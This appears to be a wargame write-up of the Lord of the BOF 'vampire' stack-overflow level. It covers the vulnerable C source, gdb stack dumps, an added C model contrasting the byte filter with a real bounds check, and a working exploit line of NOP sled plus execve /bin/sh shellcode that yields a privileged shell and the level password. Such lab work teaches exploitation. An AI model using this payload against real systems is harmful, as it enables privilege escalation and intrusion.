2017. 11. 17. 13:18 · SystemHacking/LOB (BOF원정대, "BOF Expedition")
troll / aspirin
[troll@localhost troll]$ /bin/bash2
[troll@localhost troll]$ SHELL=/bin/bash2
/*
    The Lord of the BOF : The Fellowship of the BOF
    - vampire
    - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcpy (the original listing omits this include) */

int main(int argc, char *argv[])
{
    char buffer[40];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    /* the highest byte of the return address must be 0xbf (stack region) */
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }

    // here is changed!
    /* the next byte must not be 0xff, which rules out 0xbfffxxxx addresses */
    if(argv[1][46] == '\xff')
    {
        printf("but it's not forever\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);   /* unbounded copy into the 40-byte buffer */
    printf("%s\n", buffer);
}
0x40000000 ~ 0x40111000 | 0xbfffe000 ~ 0xbfffffff
shared library region   | stack memory region
* In addition, the stack memory can use the space between 0x40111000 and 0xbfffe000.
[ Stack structure ]
buffer      40 bytes
saved ebp   4 bytes
saved eip   RET
argc
argv[0]
argv[1]
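Added example, not part of this write-up or of the LOB vampire source: the two-byte address filter from vampire.c is modelled next to an actual bounds check, so the difference between "filter the return address" and "prevent the overflow" can be exercised without running the binary. All function names (vampire_filter, bounded_copy, build_sample, filter_verdict, filter_is_not_a_bounds_check) are hypothetical; bytes past the end of the input are treated as 0, which is an assumption (the real program reads whatever happens to follow the string); the sample input is constructed and carries only the 44 filler bytes and a 4-byte address.

```c
/* Added example (not the LOB source): vampire.c's byte filter modelled
 * beside a real bounds check.  Function names are hypothetical. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40          /* same buffer size as vampire.c */

enum copy_result {
    COPY_OK = 0,
    REJECT_NOT_STACK,        /* byte 47 != 0xbf -> "stack is still your friend." */
    REJECT_BFFF,             /* byte 46 == 0xff -> "but it's not forever" */
    REJECT_TOO_LONG          /* input does not fit the buffer (hardened variant only) */
};

/* Byte of the input at position i.  Positions past the end are treated as 0
 * here (assumption); the real program reads whatever follows the string. */
static unsigned char byte_at(const unsigned char *in, size_t len, size_t i)
{
    return i < len ? in[i] : 0;
}

/* Model of vampire.c: inspect bytes 46 and 47, then copy everything.
 * The unbounded strcpy is replaced by the number of bytes it would write
 * (len + 1 for the NUL) so the model stays memory-safe; the caller
 * compares that number with BUF_SIZE. */
static enum copy_result vampire_filter(const unsigned char *in, size_t len,
                                       size_t *would_write)
{
    if (byte_at(in, len, 47) != 0xbf)
        return REJECT_NOT_STACK;
    if (byte_at(in, len, 46) == 0xff)
        return REJECT_BFFF;
    *would_write = len + 1;
    return COPY_OK;
}

/* Hardened variant: only the length decides whether the write stays
 * inside the buffer, so check it before copying. */
static enum copy_result bounded_copy(const unsigned char *in, size_t len,
                                     char *buf, size_t bufsize)
{
    if (len >= bufsize)              /* leave room for the terminating NUL */
        return REJECT_TOO_LONG;
    memcpy(buf, in, len);
    buf[len] = '\0';
    return COPY_OK;
}

/* Constructed sample with the shape used in the write-up: 44 filler bytes
 * followed by a 4-byte little-endian address.  It carries no shellcode;
 * only the length and the two inspected bytes matter here. */
static size_t build_sample(unsigned char *out, unsigned int address)
{
    size_t n = 0, i;
    for (i = 0; i < 44; i++)
        out[n++] = 'A';
    for (i = 0; i < 4; i++)
        out[n++] = (unsigned char)(address >> (8 * i));
    return n;                        /* always 48 */
}

/* What vampire.c's filter says about a sample carrying this address. */
static enum copy_result filter_verdict(unsigned int address)
{
    unsigned char sample[64];
    size_t n = build_sample(sample, address), would_write = 0;
    return vampire_filter(sample, n, &would_write);
}

/* 1 when the sample passes the filter, would overflow the 40-byte buffer,
 * and is refused by the hardened check; 0 otherwise. */
static int filter_is_not_a_bounds_check(unsigned int address)
{
    unsigned char sample[64];
    char buf[BUF_SIZE];
    size_t n = build_sample(sample, address), would_write = 0;

    if (vampire_filter(sample, n, &would_write) != COPY_OK)
        return 0;
    return would_write > BUF_SIZE &&
           bounded_copy(sample, n, buf, BUF_SIZE) == REJECT_TOO_LONG;
}

int main(void)
{
    /* 0xbffeffff (the address used in this write-up) passes both byte checks
     * and still overflows; 0xbfffffff is stopped, but only because of byte 46. */
    printf("0xbffeffff: filter verdict %d, overflow not prevented: %d\n",
           filter_verdict(0xbffeffffu), filter_is_not_a_bounds_check(0xbffeffffu));
    printf("0xbfffffff: filter verdict %d\n", filter_verdict(0xbfffffffu));
    return 0;
}
```

The point the run makes: the added check on byte 46 only shrinks the set of return addresses the filter lets through, while a 48-byte input still lands 49 bytes in a 40-byte buffer. bounded_copy rejects on length alone, so the content of bytes 46 and 47 never matters to it.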
< Solution >
[ gdb analysis ]
[troll@localhost troll]$ cp vampire vampire.cp
[troll@localhost troll]$ gdb -q vampire.cp
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048430 <main>: push %ebp
0x8048431 <main+1>: mov %ebp,%esp
0x8048433 <main+3>: sub %esp,40
.... ( omitted ) ....
0x80484cd <main+157>: leave
0x80484ce <main+158>: ret
End of assembler dump.
(gdb) b *0x80484cd
Breakpoint 1 at 0x80484cd
(gdb) run $(python -c 'print "A" * 44 + "\xbf\xbf\xbf\xbf" + "A" * 65536')
Starting program: /home/troll/vampire.cp $(python -c 'print "A" * 44 + "\xbf\xbf\xbf\xbf" +"A" * 65536')
Breakpoint 1, 0x80484cd in main ()
(gdb) x/24x $ebp-40
0xbffefac0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffefad0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffefae0: 0x41414141 0x41414141 0x41414141 0xbfbfbfbf <-- saved eip
0xbffefaf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffefb00: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffefb10: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xbffefb20: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffefb30: 0x41414141 0x41414141 0x41414141 0x41414141
[ payload ]
Starting from 0xbffeffff, execution follows the NOP sled until it reaches the shellcode, which is then executed.
[troll@localhost troll]$ ./vampire $(python -c 'print "A" * 44 + "\xff\xff\xfe\xbf" + "\x90" * 65536 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[ ... the 4 address bytes, the 65536 NOP bytes and the shellcode, printed as unprintable characters ... ]
bash$ id
uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll)
bash$ my-pass
euid = 509
music world
bash$